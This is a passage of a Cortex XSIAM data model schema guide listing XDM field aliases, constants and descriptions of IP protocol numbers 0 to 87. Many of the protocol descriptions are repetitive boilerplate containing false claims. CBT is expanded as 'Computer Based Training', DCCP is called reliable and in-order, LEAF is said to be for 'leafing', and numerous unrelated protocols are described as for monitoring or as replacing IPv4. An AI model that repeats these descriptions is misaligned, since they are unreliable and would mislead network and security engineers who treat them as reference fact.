Cortex Data Model Schema Guide

Confidential - Copyright © Palo Alto Networks

1. Introduction

2. XDM Aliases
2.1. XDM_ALIAS.ipv4

2.2. XDM_ALIAS.ipv6

2.3. XDM_ALIAS.ip

2.4. XDM_ALIAS.user

2.5. XDM_ALIAS.identity_type

2.6. XDM_ALIAS.file

2.7. XDM_ALIAS.file_hash

2.8. XDM_ALIAS.domain

2.9. XDM_ALIAS.hostname

2.10. XDM_ALIAS.country

2.11. XDM_ALIAS.resource

2.12. XDM_ALIAS.cloud_project

2.13. XDM_ALIAS.cloud_provider

2.14. XDM_ALIAS.cloud_zone

3. XDM Consts
3.1. XDM_CONST.EVENT_TAG

3.2. XDM_CONST.OUTCOME

3.3. XDM_CONST.PRIVILEGE_LEVEL

3.4. XDM_CONST.USER_TYPE

3.5. XDM_CONST.IP_PROTOCOL

3.6. XDM_CONST.CLOUD_PROVIDER

3.7. XDM_CONST.OS_FAMILY

3.8. XDM_CONST.AGENT_TYPE

3.9. XDM_CONST.SIGNATURE_STATUS

3.10. XDM_CONST.REGISTRY_VALUE_TYPE

3.11. XDM_CONST.HTTP_METHOD

3.12. XDM_CONST.HTTP_RSP_CODE

3.13. XDM_CONST.DHCP_MESSAGE_TYPE

3.14. XDM_CONST.DCERPC_OPERATION

3.15. XDM_CONST.KERBEROS_MSG_TYPE

3.16. XDM_CONST.KERBEROS_PRINCIPAL_TYPE

3.17. XDM_CONST.KERBEROS_KDC_OPTION

3.18. XDM_CONST.KERBEROS_ENCRYPTION_TYPE

3.19. XDM_CONST.KERBEROS_PA_TYPE

3.20. XDM_CONST.KERBEROS_ERROR_CODE

3.21. XDM_CONST.LDAP_OPERATION

3.22. XDM_CONST.LDAP_SCOPE

3.23. XDM_CONST.LDAP_BIND_AUTH_TYPE

3.24. XDM_CONST.LOGON_TYPE

3.25. XDM_CONST.LOGON_IMPERSONATION_LEVEL

3.26. XDM_CONST.LOGON_ASSIGNED_RIGHT

3.27. XDM_CONST.DB_OPERATION

3.28. XDM_CONST.MITRE_TACTIC

3.29. XDM_CONST.MITRE_TECHNIQUE

3.30. XDM_CONST.THREAT_CATEGORY

3.31. XDM_CONST.URL_CATEGORY

3.32. XDM_CONST.DNS_RESPONSE_CODE

3.33. XDM_CONST.DNS_RECORD_TYPE

3.34. XDM_CONST.OPERATION_TYPE

3.35. XDM_CONST.IDENTITY_TYPE

3.36. XDM_CONST.SCOPE_TYPE

3.37. XDM_CONST.LOG_LEVEL

4. XDM Fieldsets
4.1. fieldset.xdm_core

4.2. fieldset.xdm_cloud

4.3. fieldset.xdm_endpoint

4.4. fieldset.xdm_identity

4.5. fieldset.xdm_network

5. XDM Fields
5.1. xdm.session_context_id

5.2. xdm.event

5.3. xdm.source

5.4. xdm.intermediate

5.5. xdm.target

5.6. xdm.observer

5.7. xdm.alert

5.8. xdm.network

5.9. xdm.auth

5.10. xdm.logon

5.11. xdm.database

5.12. xdm.email

6. XDM System Fields

6.1. _insert_time

6.2. _time

6.3. _vendor

6.4. _product

6.5. _reception_time
1 | Introduction
Cortex XSIAM enables you to map your logs into a single, unified data model. This data model provides a consolidated schema, and a simpler way to interact with your data, regardless of its source or dataset. This includes information about the Cortex Data Model (XDM) fields, consts, fieldsets, and aliases.

2 | XDM Aliases

2.1 | XDM_ALIAS.ipv4
Alias of the following fields:

• xdm.source.ipv4
• xdm.target.ipv4
• xdm.intermediate.ipv4
• xdm.source.host.ipv4_addresses
• xdm.target.host.ipv4_addresses
• xdm.intermediate.host.ipv4_addresses
• xdm.network.dhcp.ciaddr
• xdm.network.dhcp.yiaddr
• xdm.network.dhcp.siaddr
• xdm.network.dhcp.giaddr
• xdm.network.vpn.allocated_ipv4

2.2 | XDM_ALIAS.ipv6
Alias of the following fields:

• xdm.source.ipv6
• xdm.target.ipv6
• xdm.intermediate.ipv6
• xdm.source.host.ipv6_addresses
• xdm.target.host.ipv6_addresses
• xdm.intermediate.host.ipv6_addresses
• xdm.network.vpn.allocated_ipv6

2.3 | XDM_ALIAS.ip
Alias of the following fields:

• xdm.source.ipv4
• xdm.target.ipv4
• xdm.intermediate.ipv4
• xdm.source.host.ipv4_addresses
• xdm.target.host.ipv4_addresses
• xdm.intermediate.host.ipv4_addresses
• xdm.network.dhcp.ciaddr
• xdm.network.dhcp.yiaddr
• xdm.network.dhcp.siaddr
• xdm.network.dhcp.giaddr
• xdm.network.vpn.allocated_ipv4
• xdm.source.ipv6
• xdm.target.ipv6
• xdm.intermediate.ipv6
• xdm.source.host.ipv6_addresses
• xdm.target.host.ipv6_addresses
• xdm.intermediate.host.ipv6_addresses
• xdm.network.vpn.allocated_ipv6

2.4 | XDM_ALIAS.user
Alias of the following fields:

• xdm.source.user.username
• xdm.target.user.username
• xdm.intermediate.user.username
• xdm.auth.ntlm.user_name
• xdm.source.user.identifier
• xdm.target.user.identifier
• xdm.intermediate.user.identifier
• xdm.source.user.first_name
• xdm.target.user.first_name
• xdm.intermediate.user.first_name
• xdm.source.user.last_name
• xdm.target.user.last_name
• xdm.intermediate.user.last_name
• xdm.source.user.middle_name
• xdm.target.user.middle_name
• xdm.intermediate.user.middle_name

2.5 | XDM_ALIAS.identity_type
Alias of the following fields:

• xdm.source.user.identity_type
• xdm.target.user.identity_type
• xdm.intermediate.user.identity_type

2.6 | XDM_ALIAS.file
Alias of the following fields:
 • xdm.source.process.executable.filename
• xdm.source.process.executable.path
• xdm.source.process.executable.directory
• xdm.source.process.executable.extension
• xdm.source.process.executable.file_type
• xdm.target.process.executable.filename
• xdm.target.process.executable.path
• xdm.target.process.executable.directory
• xdm.target.process.executable.extension
• xdm.target.process.executable.file_type
• xdm.intermediate.process.executable.filename
• xdm.intermediate.process.executable.path
• xdm.intermediate.process.executable.directory
• xdm.intermediate.process.executable.extension
• xdm.intermediate.process.executable.file_type
• xdm.target.module.filename
• xdm.target.module.path
• xdm.target.module.directory
• xdm.target.module.extension
• xdm.target.module.file_type
• xdm.target.file.filename
• xdm.target.file.path
• xdm.target.file.directory
• xdm.target.file.extension
• xdm.target.file.file_type
• xdm.target.file_before.filename
• xdm.target.file_before.path
• xdm.target.file_before.directory
• xdm.target.file_before.extension
• xdm.target.file_before.file_type
• xdm.email.attachment.filename
• xdm.email.attachment.path
• xdm.email.attachment.directory
• xdm.email.attachment.extension
• xdm.email.attachment.file_type

2.7 | XDM_ALIAS.file_hash
Alias of the following fields:

• xdm.source.process.executable.md5
• xdm.source.process.executable.sha256
• xdm.target.process.executable.md5
• xdm.target.process.executable.sha256
• xdm.intermediate.process.executable.md5
• xdm.intermediate.process.executable.sha256
• xdm.target.module.md5
• xdm.target.module.sha256
• xdm.target.file.md5
• xdm.target.file.sha256
• xdm.target.file_before.md5
• xdm.target.file_before.sha256
• xdm.email.attachment.md5
• xdm.email.attachment.sha256

2.8 | XDM_ALIAS.domain
Alias of the following fields:

• xdm.target.domain
• xdm.network.http.domain
• xdm.network.dns.dns_question.name
• xdm.network.dns.dns_resource_record.name
• xdm.source.user.domain
• xdm.target.user.domain
• xdm.intermediate.user.domain
• xdm.auth.ntlm.dns_domain
• xdm.auth.ntlm.domain

2.9 | XDM_ALIAS.hostname
Alias of the following fields:

• xdm.source.host.hostname
• xdm.target.host.hostname
• xdm.intermediate.host.hostname
• xdm.auth.ntlm.hostname
• xdm.auth.ntlm.dns_hostname
• xdm.network.dhcp.client_hostname

2.10 | XDM_ALIAS.country
Alias of the following fields:

• xdm.source.location.country
• xdm.target.location.country
• xdm.intermediate.location.country

2.11 | XDM_ALIAS.resource
Alias of the following fields:

• xdm.target.resource.name
• xdm.target.resource.id
• xdm.target.resource_before.name
• xdm.target.resource_before.id

2.12 | XDM_ALIAS.cloud_project
Alias of the following fields:

• xdm.source.cloud.project
• xdm.target.cloud.project
• xdm.intermediate.cloud.project

2.13 | XDM_ALIAS.cloud_provider
Alias of the following fields:

• xdm.source.cloud.provider
• xdm.target.cloud.provider
• xdm.intermediate.cloud.provider

2.14 | XDM_ALIAS.cloud_zone
Alias of the following fields:
 • xdm.source.cloud.zone
• xdm.target.cloud.zone
• xdm.intermediate.cloud.zone

3 | XDM Consts

3.1 | XDM_CONST.EVENT_TAG
List of tags that are related to the activity.

Original Mapped Description

AUTHENTICATION XDM_CONST.EVENT_TAG_AUTHENTICATION

NETWORK XDM_CONST.EVENT_TAG_NETWORK

CLOUD XDM_CONST.EVENT_TAG_CLOUD

SAAS XDM_CONST.EVENT_TAG_SAAS

ONPREM XDM_CONST.EVENT_TAG_ONPREM

VPN XDM_CONST.EVENT_TAG_VPN

3.2 | XDM_CONST.OUTCOME
A result of an activity.

Original Mapped Description

SUCCESS XDM_CONST.OUTCOME_SUCCESS The activity completed successfully. For example, a file was successfully transferred from one location to another.

FAILED XDM_CONST.OUTCOME_FAILED The activity did not complete successfully. For example, an attempt to delete a file failed because it was being used by another process.

PARTIAL XDM_CONST.OUTCOME_PARTIAL The activity completed partially successfully. For example, a batch of records were imported into a database, but some of the records were invalid and could not be imported.

UNKNOWN XDM_CONST.OUTCOME_UNKNOWN The outcome of the activity is unknown, or the outcome has not been determined yet.

3.3 | XDM_CONST.PRIVILEGE_LEVEL
A canonical privilege level.

Original Mapped Description

GUEST XDM_CONST.PRIVILEGE_LEVEL_GUEST A user account with the least privileges.

USER XDM_CONST.PRIVILEGE_LEVEL_USER A regular user account with standard privileges.

ADMIN XDM_CONST.PRIVILEGE_LEVEL_ADMIN A user account with administrative privileges.

SYSTEM XDM_CONST.PRIVILEGE_LEVEL_SYSTEM A user account with the highest level of privileges, often reserved for operation-system processes.

3.4 | XDM_CONST.USER_TYPE
The user type.

Original Mapped Description

REGULAR XDM_CONST.USER_TYPE_REGULAR A regular user account, typically associated with a person.

SERVICE_ACCOUNT XDM_CONST.USER_TYPE_SERVICE_ACCOUNT A user account for a service or application, typically used to perform automated tasks or to access resources.

MACHINE_ACCOUNT XDM_CONST.USER_TYPE_MACHINE_ACCOUNT A user account for a machine or device, typically used to authenticate and manage access to resources.

3.5 | XDM_CONST.IP_PROTOCOL
The transport layer in the OSI model. Also known as IP Protocol. See https://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml.

Original Mapped Description

0 XDM_CONST.IP_PROTOCOL_HOPOPT IPv6 Hop-by-Hop Option is an optional header used to carry optional information that must be examined by every node along a packet's delivery path.

1 XDM_CONST.IP_PROTOCOL_ICMP The Internet Control Message Protocol (ICMP) is a protocol used to send error messages and operational information between network devices. It is an integral part of the Internet Protocol (IP) and is used to report errors and provide other information
about the status of the IP network.

2 XDM_CONST.IP_PROTOCOL_IGMP The Internet Group Management Protocol (IGMP) is a protocol used by IP hosts to report their multicast group membership to multicast routers. It is used to establish multicast group memberships and facilitate the delivery of multicast traffic to the
appropriate hosts.

3 XDM_CONST.IP_PROTOCOL_GGP The Gateway-to-Gateway Protocol (GGP) was a routing protocol used in the early days of the Internet. It was designed to exchange routing information between gateways (now called routers) and was used to build the first Internet routing table.

4 XDM_CONST.IP_PROTOCOL_IP The Internet Protocol (IP) is the primary protocol used for communication on the Internet. It is responsible for routing packets between devices on the network and ensuring that they are delivered to the correct destination.

5 XDM_CONST.IP_PROTOCOL_ST The ST Protocol (also known as the ST Datagram Mode Protocol) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other without establishing a
connection first.

6 XDM_CONST.IP_PROTOCOL_TCP The Transmission Control Protocol (TCP) is a transport layer protocol used to establish and maintain connections between devices on a network. It is a reliable, connection-oriented protocol that ensures that data is delivered to the correct destination
in the correct order.
Original Mapped Description

7 XDM_CONST.IP_PROTOCOL_CBT The CBT (Computer Based Training) Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
computer-based training applications.

8 XDM_CONST.IP_PROTOCOL_EGP The Exterior Gateway Protocol (EGP) was a routing protocol used in the early days of the Internet. It was designed to exchange routing information between autonomous systems (networks under a common administrative domain) and was used to
build the first Internet routing table.

9 XDM_CONST.IP_PROTOCOL_IGP An Interior Gateway Protocol (IGP) is a routing protocol used to exchange routing information within an autonomous system (a network under a common administrative domain). Examples of IGPs include OSPF, EIGRP, and IS-IS.

10 XDM_CONST.IP_PROTOCOL_BBN_RCC_MON The BBN RCC Monitoring Protocol was a short-lived experimental protocol developed by BBN Technologies in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to
be used for monitoring and measurement purposes.

11 XDM_CONST.IP_PROTOCOL_NVP_II The NVP-II (Network Voice Protocol) was an early experimental protocol developed by Xerox PARC for voice communication over the Internet. It was designed to allow devices to send voice data over the Internet using datagrams (packets).

12 XDM_CONST.IP_PROTOCOL_PUP The PUP (PARC Universal Packet) Protocol was a short-lived experimental protocol developed by Xerox PARC in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them
to be used for a wide variety of applications.

13 XDM_CONST.IP_PROTOCOL_ARGUS The ARGUS Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for monitoring and
measurement purposes.

14 XDM_CONST.IP_PROTOCOL_EMCON The EMCON (Emission Control) Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
monitoring and measurement purposes.

15 XDM_CONST.IP_PROTOCOL_XNET The XNET Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for monitoring and
measurement purposes.

16 XDM_CONST.IP_PROTOCOL_CHAOS The CHAOS Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for monitoring and
measurement purposes.

17 XDM_CONST.IP_PROTOCOL_UDP The User Datagram Protocol (UDP) is a transport layer protocol used to send datagrams (packets) over a network. It is a connectionless protocol, which means that it does not establish a connection before sending data and does not guarantee that
data will be delivered to the destination.

18 XDM_CONST.IP_PROTOCOL_MUX The MUX Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for multiplexing (combining
multiple signals into one) purposes.

19 XDM_CONST.IP_PROTOCOL_DCN_MEAS The DCN Measurement Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for monitoring
and measurement purposes.

20 XDM_CONST.IP_PROTOCOL_HMP The Host Monitoring Protocol (HMP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
monitoring and measurement purposes.

21 XDM_CONST.IP_PROTOCOL_PRM The Packet Radio Measurement Protocol (PRM) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used
for monitoring and measurement purposes.

22 XDM_CONST.IP_PROTOCOL_XNS_IDP The Xerox Network System (XNS) Internet Datagram Protocol (IDP) was an early experimental protocol developed by Xerox PARC for communication on the Internet. It was designed to allow devices to send datagrams (packets) to each other over the
Internet.

23 XDM_CONST.IP_PROTOCOL_TRUNK_1 The TRUNK-1 Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for trunking (combining
multiple signals into one) purposes.

24 XDM_CONST.IP_PROTOCOL_TRUNK_2 The TRUNK-2 Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for trunking (combining
multiple signals into one) purposes.

25 XDM_CONST.IP_PROTOCOL_LEAF_1 The LEAF-1 Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for leafing (combining
multiple signals into one) purposes.

26 XDM_CONST.IP_PROTOCOL_LEAF_2 The LEAF-2 Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for leafing (combining
multiple signals into one) purposes.

27 XDM_CONST.IP_PROTOCOL_RDP The Reliable Data Protocol (RDP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to provide reliable, in-order delivery of datagrams (packets) over an unreliable network.

28 XDM_CONST.IP_PROTOCOL_IRTP The Internet Reliable Transaction Protocol (IRTP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to provide reliable, in-order delivery of datagrams (packets) over an unreliable network.

29 XDM_CONST.IP_PROTOCOL_ISO_TP4 The ISO Transport Protocol Class 4 (ISO TP4) was an early experimental protocol developed by the International Organization for Standardization (ISO) for communication on the Internet. It was designed to allow devices to send datagrams (packets)
to each other over the Internet.

30 XDM_CONST.IP_PROTOCOL_NETBLT The Network Block Transfer Protocol (NETBLT) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send large blocks of data to each other over the Internet.

31 XDM_CONST.IP_PROTOCOL_MFE_NSP The MFE Network Services Protocol (MFE-NSP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used
for monitoring and measurement purposes.

32 XDM_CONST.IP_PROTOCOL_MERIT_INP The MERIT Internodal Protocol (MERIT-INP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
monitoring and measurement purposes.

33 XDM_CONST.IP_PROTOCOL_DCCP The Datagram Congestion Control Protocol (DCCP) is a transport layer protocol used to send datagrams (packets) over a network. It is a connectionless protocol that provides reliable, in-order delivery of datagrams while also allowing for congestion
control.

34 XDM_CONST.IP_PROTOCOL_3PC The Third Party Connect Protocol (3PC) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
monitoring and measurement purposes.

35 XDM_CONST.IP_PROTOCOL_IDPR The Inter-Domain Policy Routing Protocol (IDPR) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used
for routing purposes between different domains (networks).

36 XDM_CONST.IP_PROTOCOL_XTP The Xpress Transfer Protocol (XTP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for high-
speed data transfer.

37 XDM_CONST.IP_PROTOCOL_DDP The Datagram Delivery Protocol (DDP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
routing purposes between different domains (networks).

38 XDM_CONST.IP_PROTOCOL_IDPR_CMTP The Inter-Domain Policy Routing Control Message Transport Protocol (IDPR-CMTP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a
way that would allow them to be used for routing control purposes between different domains (networks).
Original Mapped Description

39 XDM_CONST.IP_PROTOCOL_TP The TP Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for routing purposes between
different domains (networks).

40 XDM_CONST.IP_PROTOCOL_IL The IL Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for routing purposes between
different domains (networks).

41 XDM_CONST.IP_PROTOCOL_IPV6 Internet Protocol version 6 (IPv6) is the latest version of the Internet Protocol (IP), the communication protocol that provides an identification and location system for computers on networks and routes traffic across the Internet. It was designed to
replace the older IPv4, which had become inadequate due to the explosive growth of the Internet.

42 XDM_CONST.IP_PROTOCOL_SDRP The Source Demand Routing Protocol (SDRP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used
for routing purposes between different domains (networks).

43 XDM_CONST.IP_PROTOCOL_IPV6_ROUTE The IPv6 Routing Protocol (IPv6-Route) is a protocol used for routing Internet Protocol version 6 (IPv6) packets between different domains (networks). It was designed to replace the older IPv4 routing protocols, which had become inadequate due to
the explosive growth of the Internet.

44 XDM_CONST.IP_PROTOCOL_IPV6_FRAG The IPv6 Fragmentation Protocol (IPv6-Frag) is a protocol used for fragmenting Internet Protocol version 6 (IPv6) packets into smaller pieces for transmission over networks that have a smaller maximum packet size. It was designed to replace the
older IPv4 fragmentation protocols, which had become inadequate due to the explosive growth of the Internet.

45 XDM_CONST.IP_PROTOCOL_IDRP The Inter-Domain Routing Protocol (IDRP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
routing purposes between different domains (networks).

46 XDM_CONST.IP_PROTOCOL_RSVP The Resource ReSerVation Protocol (RSVP) is a protocol used for reserving resources in a network for real-time applications. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to request and
reserve resources such as bandwidth, buffer space, and processing power.

47 XDM_CONST.IP_PROTOCOL_GRE The Generic Routing Encapsulation (GRE) Protocol is a tunneling protocol used to carry other protocols over an Internet Protocol (IP) network. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them
to be encapsulated (wrapped) in a GRE header for transmission over an IP network.

48 XDM_CONST.IP_PROTOCOL_DSR The Dynamic Source Routing Protocol (DSR) is a routing protocol used for ad hoc mobile networks. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to dynamically discover and maintain
routes to their destination without the need for a central routing server.

49 XDM_CONST.IP_PROTOCOL_BNA The BNA Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for networking purposes.

50 XDM_CONST.IP_PROTOCOL_ESP The Encapsulating Security Payload (ESP) Protocol is a security protocol used to provide confidentiality, integrity, and authenticity to Internet Protocol (IP) packets. It was designed to allow devices to send datagrams (packets) to each other in a way
that would allow them to be encrypted and authenticated for secure transmission over an IP network.

51 XDM_CONST.IP_PROTOCOL_AH The Authentication Header (AH) Protocol is a security protocol used to provide authenticity and integrity to Internet Protocol (IP) packets. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be
authenticated for secure transmission over an IP network.

52 XDM_CONST.IP_PROTOCOL_I_NLSP The Integrated Net Layer Security Protocol (I-NLSP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be
used for networking purposes.

53 XDM_CONST.IP_PROTOCOL_SWIPE The Simple Internet Protocol for Emerging Networks (SWIPE) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow
them to be used for networking purposes.

54 XDM_CONST.IP_PROTOCOL_NARP The NBMA Address Resolution Protocol (NARP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used
for networking purposes.

55 XDM_CONST.IP_PROTOCOL_MOBILE The Mobile IP Protocol is a protocol used for routing Internet Protocol (IP) packets between devices that are connected to a mobile network. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to
remain connected and reachable while on the move.

56 XDM_CONST.IP_PROTOCOL_TLSP The Transport Layer Security Protocol (TLSP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used
for networking purposes.

57 XDM_CONST.IP_PROTOCOL_SKIP The Simple Key-Management for Internet Protocols (SKIP) Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would
allow them to be used for networking purposes.

58 XDM_CONST.IP_PROTOCOL_IPV6_ICMP The Internet Protocol version 6 (IPv6) Internet Control Message Protocol (ICMP) is a protocol used for error reporting, congestion control, and informational messages in IPv6 networks. It was designed to replace the older IPv4 ICMP protocol, which
had become inadequate due to the explosive growth of the Internet.

59 XDM_CONST.IP_PROTOCOL_IPV6_NONXT The IPv6 No Next Header (IPv6-Nonxt) Protocol is a protocol used to indicate the end of a list of extension headers in an Internet Protocol version 6 (IPv6) packet. It was designed to replace the older IPv4 protocol, which had become inadequate due
to the explosive growth of the Internet.

60 XDM_CONST.IP_PROTOCOL_IPV6_OPTS The IPv6 Options (IPv6-Opts) Protocol is a protocol used to carry optional information in an Internet Protocol version 6 (IPv6) packet. It was designed to replace the older IPv4 options protocol, which had become inadequate due to the explosive growth
of the Internet.

62 XDM_CONST.IP_PROTOCOL_CFTP The CFTP Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for file transfer purposes.

64 XDM_CONST.IP_PROTOCOL_SAT_EXPAK The SATNET and Backroom EXPAK Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
networking purposes.

65 XDM_CONST.IP_PROTOCOL_KRYPTOLAN The KRYPTOLAN Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for networking
purposes.

66 XDM_CONST.IP_PROTOCOL_RVD The MIT Remote Virtual Disk Protocol (RVD) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
networking purposes.

67 XDM_CONST.IP_PROTOCOL_IPPC The Internet Pluribus Packet Core Protocol (IPPC) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be
used for networking purposes.

69 XDM_CONST.IP_PROTOCOL_SAT_MON The SATNET Monitoring Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for networking
purposes.

70 XDM_CONST.IP_PROTOCOL_VISA The VISA Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for networking purposes.

71 XDM_CONST.IP_PROTOCOL_IPCV The Internet Packet Core Utility Protocol (IPCV) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used
for networking purposes.

72 XDM_CONST.IP_PROTOCOL_CPNX The Computer Protocol Network Executive Protocol (CPNX) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them
to be used for networking purposes.

73 XDM_CONST.IP_PROTOCOL_CPHB The Computer Protocol Heartbeat Protocol (CPHB) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be
used for networking purposes.
Original Mapped Description

74 XDM_CONST.IP_PROTOCOL_WSN The WANG Span Network Protocol (WSN) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
networking purposes.

75 XDM_CONST.IP_PROTOCOL_PVP The Packet Video Protocol (PVP) was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for video
streaming purposes.

76 XDM_CONST.IP_PROTOCOL_BR_SAT_MON The Backroom SATNET Monitoring Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
networking purposes.

77 XDM_CONST.IP_PROTOCOL_SUN_ND The SUN ND Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for networking purposes.

78 XDM_CONST.IP_PROTOCOL_WB_MON The WIDEBAND Monitoring Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for
networking purposes.

79 XDM_CONST.IP_PROTOCOL_WB_EXPAK The WIDEBAND EXPAK Protocol was a short-lived experimental protocol developed in the early days of the Internet. It was designed to allow devices to send datagrams (packets) to each other in a way that would allow them to be used for networking
purposes.

80 XDM_CONST.IP_PROTOCOL_ISO_IP The International Standards Organization Internet Protocol (ISO-IP) is a protocol used for error reporting, congestion control, and informational messages in international networks. It was designed to be compatible with the older IPv4 protocol, which
had become inadequate due to the explosive growth of the Internet.

81 XDM_CONST.IP_PROTOCOL_VMTP The Versatile Message Transaction Protocol (VMTP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to
the explosive growth of the Internet.

82 XDM_CONST.IP_PROTOCOL_SECURE_VMTP The Secure VMTP Protocol is a protocol used to send secure messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive
growth of the Internet.

83 XDM_CONST.IP_PROTOCOL_VINES The VINES Protocol is a protocol used to send messages between computers in a distributed system. It was developed by Banyan Systems, Inc. and was designed to be more reliable and efficient than the older IPv4 protocol, which had become
inadequate due to the explosive growth of the Internet.

84 XDM_CONST.IP_PROTOCOL_TTP The TTP Protocol is a protocol used to send messages between computers in a distributed system. It was developed by Xerox Corporation and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate
due to the explosive growth of the Internet.

85 XDM_CONST.IP_PROTOCOL_NSFNET_IGP The NSFNET Interior Gateway Protocol (NSFNET-IGP) is a protocol used to send messages between computers in a distributed system. It was developed by the National Science Foundation (NSF) and was designed to be more reliable and efficient
than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.

86 XDM_CONST.IP_PROTOCOL_DGP The Dissimilar Gateway Protocol (DGP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive
growth of the Internet.

87 XDM_CONST.IP_PROTOCOL_TCF The TCF Protocol is a protocol used to send messages between computers in a distributed system. It was developed by the Trusted Information Systems (TIS) company and was designed to be more reliable and efficient than the older IPv4 protocol,
which had become inadequate due to the explosive growth of the Internet.

